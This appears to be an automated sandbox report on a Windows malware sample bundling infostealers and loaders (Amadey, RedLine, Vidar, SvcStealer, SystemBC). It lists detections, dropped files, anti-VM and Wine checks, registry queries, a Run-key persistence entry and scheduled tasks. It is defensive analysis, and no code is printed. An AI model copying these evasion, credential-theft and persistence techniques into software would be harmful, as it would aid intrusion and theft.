Malware Analysis Report

2025-04-03 09:16

Sample ID 250305-b4tfpavpt6
Target 56e840cfaa39fa8934874c132402f3da87a9a29560e7fcedc92143782bd34df8
SHA256 56e840cfaa39fa8934874c132402f3da87a9a29560e7fcedc92143782bd34df8
Tags
amadey redline svcstealer systembc vidar 092155 ir7am testproliv credential_access defense_evasion discovery downloader execution infostealer persistence pyinstaller spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

56e840cfaa39fa8934874c132402f3da87a9a29560e7fcedc92143782bd34df8

Threat Level: Known bad

The file 56e840cfaa39fa8934874c132402f3da87a9a29560e7fcedc92143782bd34df8 was found to be: Known bad.

Malicious Activity Summary

amadey redline svcstealer systembc vidar 092155 ir7am testproliv credential_access defense_evasion discovery downloader execution infostealer persistence pyinstaller spyware stealer trojan

Detect Vidar Stealer

Svcstealer family

Systembc family

RedLine

Vidar family

SvcStealer, Diamotrix

Redline family

Amadey family

Vidar

SystemBC

RedLine payload

Amadey

Detects SvcStealer Payload

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Command and Scripting Interpreter: PowerShell

Uses browser remote debugging

Downloads MZ/PE file

Identifies Wine through registry keys

Reads user/profile data of local email clients

Checks computer location settings

Executes dropped EXE

Checks BIOS information in registry

Reads user/profile data of web browsers

.NET Reactor proctector

Loads dropped DLL

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

AutoIT Executable

Drops file in Windows directory

Browser Information Discovery

Unsigned PE

Detects Pyinstaller

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Program crash

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

Delays execution with timeout.exe

Checks processor information in registry

Scheduled Task/Job: Scheduled Task

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Enumerates system info in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-03-05 01:42

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-03-05 01:42

Reported

2025-03-05 01:44

Platform

win10v2004-20250217-en

Max time kernel

95s

Max time network

150s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects SvcStealer Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

SvcStealer, Diamotrix

stealer downloader svcstealer

Svcstealer family

svcstealer

SystemBC

trojan systembc

Systembc family

systembc

Vidar

stealer vidar

Vidar family

vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2d1728.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe N/A

Uses browser remote debugging

credential_access stealer
Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2d1728.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2d1728.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1p75e5.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1p75e5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2d1728.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe N/A
N/A N/A C:\Windows\TEMP\{CF76D235-72E8-4901-A72C-4281AFB358A0}\.cr\z3SJkC5.exe N/A
N/A N/A C:\Windows\TEMP\{6340C324-E96D-4236-A330-87A672404F0F}\.ba\WiseTurbo.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10077160101\bPDDW9F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10077730101\JCFx2xj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10078350101\BXxKvLN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10087020101\OEHBOHk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2d1728.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\56e840cfaa39fa8934874c132402f3da87a9a29560e7fcedc92143782bd34df8.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cbdaffbfbcdaefbc = "\"C:\\ProgramData\\cbdaffbfbcdaefbc.exe\"" C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe N/A

Checks installed software on the system

discovery

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1p75e5.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe N/A

Browser Information Discovery

discovery

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2d1728.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\TEMP\{CF76D235-72E8-4901-A72C-4281AFB358A0}\.cr\z3SJkC5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\TEMP\{6340C324-E96D-4236-A330-87A672404F0F}\.ba\WiseTurbo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\56e840cfaa39fa8934874c132402f3da87a9a29560e7fcedc92143782bd34df8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10077730101\JCFx2xj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1p75e5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133856125825006514" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2d1728.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2d1728.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe N/A
N/A N/A C:\Windows\TEMP\{6340C324-E96D-4236-A330-87A672404F0F}\.ba\WiseTurbo.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
